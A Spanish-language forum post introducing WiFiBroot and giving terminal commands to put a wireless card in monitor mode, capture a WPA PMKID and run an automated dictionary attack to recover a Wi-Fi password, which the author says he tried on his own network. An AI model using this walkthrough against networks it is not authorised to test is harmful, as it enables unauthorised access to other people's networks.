Board Stats

  • stats Total de Usuarios: 23272
  • stats Total de Mensajes: 108160
  • stats Total de Temas: 10391
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1021

Ultimo registro



Autor Tema: WiFiBroot: Captura PMKID+Ataque por diccionario automatizado  (Leído 1691 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Voromir

  • Usuario
  • *
  • Mensajes: 121
WiFiBroot: Captura PMKID+Ataque por diccionario automatizado
« en: Agosto 27, 2018, 15:55:36 pm »
Hola amig@s!!

Navegando e indagando un poco sobre el nuevo método PMKID y para comprobar la seguridad de mi red, descubrí por casualidad una interesante herramienta de hash3liZer==> WiFiBroot

https://user-images.githubusercontent.com/29171692/43396374-bead0ee2-941a-11e8-82d4-76061ccbfe96.png
WiFiBroot: Captura PMKID+Ataque por diccionario automatizado


Fuente:

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Tutorial:

La distro con la que he hecho pruebas es=> Wifislax64-1.1-final
He instalado y/o actualizado las siguientes herramientas:

hcxdumptool v4.2.0 o superior
hcxtools v4.2.0 o superior
hashcat v4.2.0 o superior

==> Instalamos el script

Desde la consola de comandos o terminal ponemos:

#git clone
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


#sudo pip install scapy
 #cd WiFiBroot
 #WiFiBroot/airmon-ng
 #WiFiBroot/airmon-ng check kill
 #WiFiBroot/airmon-ng start wlan0 (usa el comando iwconfig para saber que wlan está en modo monitor,en mi caso wlan0)
 #WiFiBroot/sudo python wifibroot.py -i mon0 -v -m 2 -d dicts/list.txt     
                               
Comienza a escanear redes, CTRL+C para parar,elegimos nº de red.El ataque lo hace automático tanto la captura PMKID como el ataque por diccionario

*Nota:

El diccionario se halla en la subcarpeta dicts,es decir: #WiFiBroot/dicts/list.txt (puedes editarlo sin problemas,yo he copiado y pegado mi wordlist personal y lo he guardado como list.txt

Antes de capturar el PMKID de mi red,he editado el archivo list.txt con mi contraseña wifi dentro.Después de escanear y elegir mi propia red voilá ataque exitoso=>PASSWORD FOUND!!!!  8)  ;)
   
« Última modificación: Septiembre 07, 2018, 12:48:44 pm por Voromir »